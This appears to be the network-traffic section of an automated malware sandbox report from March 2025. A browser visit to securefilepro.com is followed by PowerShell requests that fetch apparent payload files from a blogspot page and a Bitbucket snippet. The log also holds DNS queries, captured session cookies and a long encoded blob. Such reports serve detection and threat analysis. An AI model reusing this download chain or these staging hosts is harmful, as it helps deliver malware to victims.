igzN2xDjrmfuyKjTr1niEqHHolWVm1bznyI72XXofXKMaaczqzfkxHDbg070L2dKMnEd1cN0xns6cl2lPJOIpITtQFw69YuI/A/8TqOnCvH0ggVVBa97hiSzx6Othe+wTNVD4T/bONmIeX6DgkQqtNsZ/ViiuxH66oZbYi5MNywOxqw0g0jFxRCh1ZCOXPLodIiBpBtyKDTzS/GbRuUVvfhc1Z26OW1Dqf3jAtJ22KT3Fpakh5L6O1Yz
            Source: global trafficHTTP traffic detected: GET /assets/sfp.html HTTP/1.1Host: www.securefilepro.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==; incap_ses_1845_3142003=gFETRHclSAPcIM3tCMKaGY9o1GcAAAAAFGIQbKmOfRwvjKC+7bdiYg==; ___utmvc=77u4GsdbDUAdVe76gzjhmf8C5VjeX8955GcerWQQQC+6x+nj51nDONojIDiIXXNL9z3efMJNvQRJlyJmhU95e4dDl2ZomVcJgI3yKSbULzrbL9p8E+/Xy7Tl0aO8lmfiz6juoFvLp7didL5J3sAqVUitDPwrOz/opQGvpO1ZaBS2o4pPrNFbJC7xncRcCen24CN4UmKNUfATu7jsJcFpqWGqtJv/9wzE9tv9GTUe3i9w4F6cusANAc2JknMDxulchOxsMLJbFmEpp+NVa2uTG/nve/SHGSQIn09ZVmkuXgfznnv0ZlHxacNPjyDsbFtGhuP04sK1AOEpH840odKVLheb5G4PCtSVSq1acfl2nKmr5lRK8QqkjFIriYh0TdFbcqaeHeV7Qo8y6nXLVaz8GTDx5vgCC35jyAbZkC2uJN85avJ8rcpsvhISBQqE0m2sgreayO8Xc8vcNMHhGimcKKyPN/SXeNw/4MmM92ThCVfuSlcoKnO1Vu1SpEAjudDNAmAIOtOM4LsfAD/ooK9Zbwm6tSY3KumroDkpI/iuopC9ycrAYDgblCOonDKJVOrwS2s79R1UqPIeuA4MIVYz2yU8KUs6mJ34cZUOhwL2lgy5xhEZRRmG23qliQMXll9uSxJYjqGzJoJDfuLp3o3DXcJIh6jzUGh5cHrsYh2jwE/v+IILTXIEbwj8Uk44hdAnidfORJrle/p3FIAnMA062NDn33NFqKbcksk4f7hzqRDWCh+SnnSpBgHUDaBz4ePZSXTiCOh5OPF9Po1NdRHIaB4IKjgvEM6g0+BierkXfmg6gUZ6V67TG65f8GNf8YHyQ7mjBi6dbdevC/vOMr/1d91DoQI0ykMHIHBSTIcLL2kylOeFs6kvOvtDSFHlzfF0cxPoPmyRd+iRy4+AJ5SDBMI3wIttsSnGmeXm45cuIfceq4oLkvkW0wfAkYVSLf9vfl9OX3WoCJy2spjMhR7WTdPpYnrB39kIrFo1AtJXyajP9/du9ournJC6GOx/a2RHrtY8+wcxun9NTesU5hcxeo5+55rB5Ub2A2GBtt2lFthJCYjs49OB4bmD82lzqAnRd8uxA/Fr9pn85RoNt9PpVmsmj4bm1ht8dwKxkD5XxPEYab06LmJO7r/rs3fTgkcXtaGzPpqTWkxnqvAbDcU9rlJ0o5zikqwMmguYgnSLdvxOMr6Y5KJoKVZBhc2voiRIA7pcnovblP3rc8MOXiWdu0/9h+bGEvXktxpGRPiOGRF+J+VD5C/QVD/ovPu5SL2SXix8DLkHVmh95J5JbUBwABOM38WqBafU/kPV8sfpyb1nsPI51/hq6u1pNNyaxVFBPjKcuchy6xOJI454GD+R2oJ38ABkcCL4COZBSqHjIIzmUIN7p0HcFif0pbvyLTlpsbioMUwev750CTa7U3cXuGJG2EToNTcaSdqO8d5+kW3bFwOFEypsk1FVrbr1GFT15UA8g/ip10XJI0aW719R44TRGA7Xjn1C3h/7Au7cpDQS73z/fX3pvO1w2e2FLo9mQLGKecxckcB0+nRX45Fnyd6Md4mV6Ir241r+UcFONMx/gXwHj4LPr53VW0xZXlxE/Uzrs6EqKxUTlXZC+WjjGWNYwE/bti7ATKANbGXiNSq5TnOFOLhEGPE/UzyV2VG3h1P/YDf9DEQ2MmYcEMtylYbWH5cBHg3zsavUijg5BvfZwhXVvmRntwddQY9NA41RiXj5yL3VloBwEVzm5bdIiBB6AT5r3OAB1Wq8WOU1cZ5fJuJLXGtxSigzN2xDjrmfuyKjTr1niEqHHolWVm1bznyI72XXofXKMaaczqzfkxHDbg070L2dKMnEd1cN0xns6cl2lPJOIpITtQFw69YuI/A/8TqOnCvH0ggVVBa97hiSzx6Othe+wTNVD4T/bONmIeX6DgkQqtNsZ/ViiuxH6
            Source: global trafficHTTP traffic detected: GET /assets/sfp.html HTTP/1.1Host: www.securefilepro.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==; incap_ses_1845_3142003=gFETRHclSAPcIM3tCMKaGY9o1GcAAAAAFGIQbKmOfRwvjKC+7bdiYg==; ___utmvc=77u4GsdbDUAdVe76gzjhmf8C5VjeX8955GcerWQQQC+6x+nj51nDONojIDiIXXNL9z3efMJNvQRJlyJmhU95e4dDl2ZomVcJgI3yKSbULzrbL9p8E+/Xy7Tl0aO8lmfiz6juoFvLp7didL5J3sAqVUitDPwrOz/opQGvpO1ZaBS2o4pPrNFbJC7xncRcCen24CN4UmKNUfATu7jsJcFpqWGqtJv/9wzE9tv9GTUe3i9w4F6cusANAc2JknMDxulchOxsMLJbFmEpp+NVa2uTG/nve/SHGSQIn09ZVmkuXgfznnv0ZlHxacNPjyDsbFtGhuP04sK1AOEpH840odKVLheb5G4PCtSVSq1acfl2nKmr5lRK8QqkjFIriYh0TdFbcqaeHeV7Qo8y6nXLVaz8GTDx5vgCC35jyAbZkC2uJN85avJ8rcpsvhISBQqE0m2sgreayO8Xc8vcNMHhGimcKKyPN/SXeNw/4MmM92ThCVfuSlcoKnO1Vu1SpEAjudDNAmAIOtOM4LsfAD/ooK9Zbwm6tSY3KumroDkpI/iuopC9ycrAYDgblCOonDKJVOrwS2s79R1UqPIeuA4MIVYz2yU8KUs6mJ34cZUOhwL2lgy5xhEZRRmG23qliQMXll9uSxJYjqGzJoJDfuLp3o3DXcJIh6jzUGh5cHrsYh2jwE/v+IILTXIEbwj8Uk44hdAnidfORJrle/p3FIAnMA062NDn33NFqKbcksk4f7hzqRDWCh+SnnSpBgHUDaBz4ePZSXTiCOh5OPF9Po1NdRHIaB4IKjgvEM6g0+BierkXfmg6gUZ6V67TG65f8GNf8YHyQ7mjBi6dbdevC/vOMr/1d91DoQI0ykMHIHBSTIcLL2kylOeFs6kvOvtDSFHlzfF0cxPoPmyRd+iRy4+AJ5SDBMI3wIttsSnGmeXm45cuIfceq4oLkvkW0wfAkYVSLf9vfl9OX3WoCJy2spjMhR7WTdPpYnrB39kIrFo1AtJXyajP9/du9ournJC6GOx/a2RHrtY8+wcxun9NTesU5hcxeo5+55rB5Ub2A2GBtt2lFthJCYjs49OB4bmD82lzqAnRd8uxA/Fr9pn85RoNt9PpVmsmj4bm1ht8dwKxkD5XxPEYab06LmJO7r/rs3fTgkcXtaGzPpqTWkxnqvAbDcU9rlJ0o5zikqwMmguYgnSLdvxOMr6Y5KJoKVZBhc2voiRIA7pcnovblP3rc8MOXiWdu0/9h+bGEvXktxpGRPiOGRF+J+VD5C/QVD/ovPu5SL2SXix8DLkHVmh95J5JbUBwABOM38WqBafU/kPV8sfpyb1nsPI51/hq6u1pNNyaxVFBPjKcuchy6xOJI454GD+R2oJ38ABkcCL4COZBSqHjIIzmUIN7p0HcFif0pbvyLTlpsbioMUwev750CTa7U3cXuGJG2EToNTcaSdqO8d5+kW3bFwOFEypsk1FVrbr1GFT15UA8g/ip10XJI0aW719R44TRGA7Xjn1C3h/7Au7cpDQS73z/fX3pvO1w2e2FLo9mQLGKecxckcB0+nRX45Fnyd6Md4mV6Ir241r+UcFONMx/gXwHj4LPr53VW0xZXlxE/Uzrs6EqKxUTlXZC+WjjGWNYwE/bti7ATKANbGXiNSq5TnOFOLhEGPE/UzyV2VG3h1P/YDf9DEQ2MmYcEMtylYbWH5cBHg3zsavUijg5BvfZwhXVvmRntwddQY9NA41RiXj5yL3VloBwEVzm5bdIiBB6AT5r3OAB1Wq8WOU1cZ5fJuJLXGtxSigzN2xDjrmfuyKjTr1niEqHHolWVm1bznyI72XXofXKMaaczqzfkxHDbg070L2dKMnEd1cN0xns6cl2lPJOIpITtQFw69YuI/A/8TqOnCvH0ggVVBa97hiSzx6Othe+wTNVD4T/bONmIeX6DgkQqtNsZ/ViiuxH6
            Source: global trafficHTTP traffic detected: GET /_Incapsula_Resource?SWKMTFSR=1&e=0.08098935374105776 HTTP/1.1Host: www.securefilepro.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==; incap_ses_1845_3142003=gFETRHclSAPcIM3tCMKaGY9o1GcAAAAAFGIQbKmOfRwvjKC+7bdiYg==; ___utmvc=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
            Source: global trafficHTTP traffic detected: GET /assets/css/styles.css?v=1.0 HTTP/1.1Host: www.securefilepro.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.securefilepro.com/assets/sfp.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==; incap_ses_1845_3142003=gFETRHclSAPcIM3tCMKaGY9o1GcAAAAAFGIQbKmOfRwvjKC+7bdiYg==
            Source: global trafficHTTP traffic detected: GET /images/landing/get.svg HTTP/1.1Host: d12bxbf7nz45kt.cloudfront.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/landing/send.svg HTTP/1.1Host: d12bxbf7nz45kt.cloudfront.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/landing/anytime.svg HTTP/1.1Host: d12bxbf7nz45kt.cloudfront.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/landing/relax.svg HTTP/1.1Host: d12bxbf7nz45kt.cloudfront.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/DrakePortals-logo.png HTTP/1.1Host: d12bxbf7nz45kt.cloudfront.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: objectSec-Fetch-Storage-Access: activeReferer: https://www.securefilepro.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.securefilepro.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.securefilepro.com/assets/sfp.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==; incap_ses_1845_3142003=gFETRHclSAPcIM3tCMKaGY9o1GcAAAAAFGIQbKmOfRwvjKC+7bdiYg==
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.securefilepro.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==; incap_ses_1845_3142003=gFETRHclSAPcIM3tCMKaGY9o1GcAAAAAFGIQbKmOfRwvjKC+7bdiYg==
            Source: global trafficHTTP traffic detected: GET /images/landing/get.svg HTTP/1.1Host: d12bxbf7nz45kt.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/landing/send.svg HTTP/1.1Host: d12bxbf7nz45kt.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/landing/anytime.svg HTTP/1.1Host: d12bxbf7nz45kt.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /images/landing/relax.svg HTTP/1.1Host: d12bxbf7nz45kt.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.securefilepro.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: visid_incap_3142003=ndeOW4aHSO+6B/uPB5VpsIpo1GcAAAAAQUIPAAAAAABdVXC670m5SVrOvsQf6+HJ; nlbi_3142003=qMeFAFDgWx2tfijF1KVeTAAAAACInktSrqiJFpS9/YQGOtfE; incap_ses_180_3142003=up+uHCMRulvT61W3UX1/Aopo1GcAAAAApQlxH2bIr45zdAIsPhniDg==; incap_ses_1845_3142003=gFETRHclSAPcIM3tCMKaGY9o1GcAAAAAFGIQbKmOfRwvjKC+7bdiYg==
            Source: global trafficHTTP traffic detected: GET /faqeeer.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: cpa12-march.blogspot.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: cpa12-march.blogspot.com
            Source: global trafficHTTP traffic detected: GET /!api/2.0/snippets/ansidjaassdasmjkkkkk/q7MRe8/3fdc148e8846d2e71b5743d242a56ff62d0a4dfc/files/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bitbucket.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: securefilepro.netlify.app
            Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
            Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: securefilepro.com
            Source: global trafficDNS traffic detected: DNS query: www.securefilepro.com
            Source: global trafficDNS traffic detected: DNS query: d12bxbf7nz45kt.cloudfront.net
            Source: global trafficDNS traffic detected: DNS query: cpa12-march.blogspot.com
            Source: global trafficDNS traffic detected: DNS query: bitbucket.org
            Source: global trafficDNS traffic detected: DNS query: beacons.gcp.gvt2.com
            Source: global trafficDNS traffic detected: DNS query: ntp1.hetzner.de
            Source: global trafficDNS traffic detected: DNS query: ntp.time.in.ua
            Source: global trafficDNS traffic detected: DNS query: gbg1.ntp.se
            Source: global trafficDNS traffic detected: DNS query: time.google.com
            Source: global trafficDNS traffic detected: DNS query: x.ns.gin.ntt.net
            Source: global trafficDNS traffic detected: DNS query: ntp.time.nl
            Source: global trafficDNS traffic detected: DNS query: ntp.nict.jp
            Source: global trafficDNS traffic detected: DNS query: beacons.gvt2.com
            Source: global trafficDNS traffic detected: DNS query: beacons2.gvt2.com
            Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
            Source: global trafficDNS traffic detected: DNS query: beacons3.gvt2.com
            Source: global trafficDNS traffic detected: DNS query: beacons4.gvt2.com
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Mar 2025 17:34:11 GMTContent-Type: text/html; charset=utf-8Content-Length: 356Connection: closex-amz-request-id: V6P4J6QBD4Y9306Wx-amz-id-2: H2IWfleTcIS9l5f5CDzFeQ9eM/lu7ODZz3PYvC/PZpIyTqZcWNXFwObe3GVpiIOHnnyYsuPh1Qw=Content-Security-Policy: default-src * data: filesystem: about: blob: ws: wss:; script-src * 'unsafe-eval' 'unsafe-inline'; style-src * 'unsafe-inline';Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CDN: ImpervaX-Iinfo: 40-26250982-26251030 NNNY CT(10 20 0) RT(1741973651373 315) q(0 0 0 -1) r(0 1) U24
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
